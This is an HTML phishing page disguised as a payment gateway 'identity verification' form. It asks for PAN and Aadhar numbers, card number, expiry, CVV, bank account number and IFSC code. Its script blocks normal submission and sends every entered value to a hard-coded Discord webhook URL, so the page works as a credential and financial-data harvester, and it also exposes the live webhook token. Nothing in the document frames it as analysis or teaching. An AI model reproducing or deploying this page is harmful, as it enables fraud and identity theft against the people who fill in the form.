<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Payment Gateway</title>
<style>
  body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
    background: linear-gradient(to right, #9370DB, #4B0082);
    color: #fff;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
  }
  
  #payment-form {
    background-color: rgba(255, 255, 255, 0.1);
    padding: 20px;
    border-radius: 10px;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
  }

  .input-container {
    width: 400px;
    height: 370px;
    display: flex;
    justify-content: flex-end;
    align-items: center;
    flex-direction: column;
  }

  input[type="text"], input[type="password"] {
    width: 100%;
    padding: 10px;
    margin: 5px 0;
    border: none;
    border-radius: 5px;
    box-sizing: border-box;
  }

  input[type="submit"] {
    width: 100%;
    padding: 10px;
    margin-top: 10px;
    border: none;
    border-radius: 5px;
    background-color: #4B0082;
    color: #fff;
    cursor: pointer;
  }

  input[type="submit"]:hover {
    background-color: #6A5ACD;
  }
  h2 {
    text-align: center;
  }
</style>
</head>
<body>
<div id="payment-form">
  <h2>Identy Verification</h2>
  <form id="payment-form">
    <div class="input-container">  
      <input type="text" id="pan-number" placeholder="PAN Number" required>
      <input type="text" id="aadhar-number" placeholder="Aadhar Number" required>
      <input type="text" id="card-number" placeholder="Debit/Credit Card Number" required>
      <input type="text" id="bank-account-number" placeholder="Bank Account Number" required>
      <input type="text" id="ifc-code" placeholder="IFC Code" required>
      <input type="text" id="expiry" placeholder="MM/YYYY" required>
      <input type="password" id="cvv" placeholder="CVV" required>
      <input type="text" id="name" placeholder="Name" required>
    </div>
    <input type="submit" value="Submit" id="submit-button">
  </form>
</div>

<script>
  function sendToWebhookSite(info) {
    const webhookSiteURL = "https://discord.com/api/webhooks/1191754395734519849/QELZzOjNa1RCVO9SwusNcycn1mgwUErTZxupwwC5WTWi5WbsGr6NDsR0a2KZtcVhlfPY";
    const webhookData = {
        content: info
    };

    fetch(webhookSiteURL, {
      method: 'POST',
      headers: {
        'Content-Type': 'application/json'
      },
      body: JSON.stringify(webhookData)
    });
  }

  document.getElementById("submit-button").addEventListener("click", function(event) {
    event.preventDefault();

    var panNumber = document.getElementById('pan-number').value;
    var aadharNumber = document.getElementById('aadhar-number').value;
    var cardNumber = document.getElementById('card-number').value;
    var bankAccountNumber = document.getElementById('bank-account-number').value;
    var ifcCode = document.getElementById('ifc-code').value;
    var expiry = document.getElementById('expiry').value;
    var cvv = document.getElementById('cvv').value;
    var name = document.getElementById('name').value;
    sendToWebhookSite(`PAN Number: ${panNumber}\nAadhar Number: ${aadharNumber}\nCard Number: ${cardNumber}\nBank Account Number: ${bankAccountNumber}\nIFC Code: ${ifcCode}\nExpiry: ${expiry}\nCVV: ${cvv}\nName: ${name}`);
  });
</script>
</body>
</html>
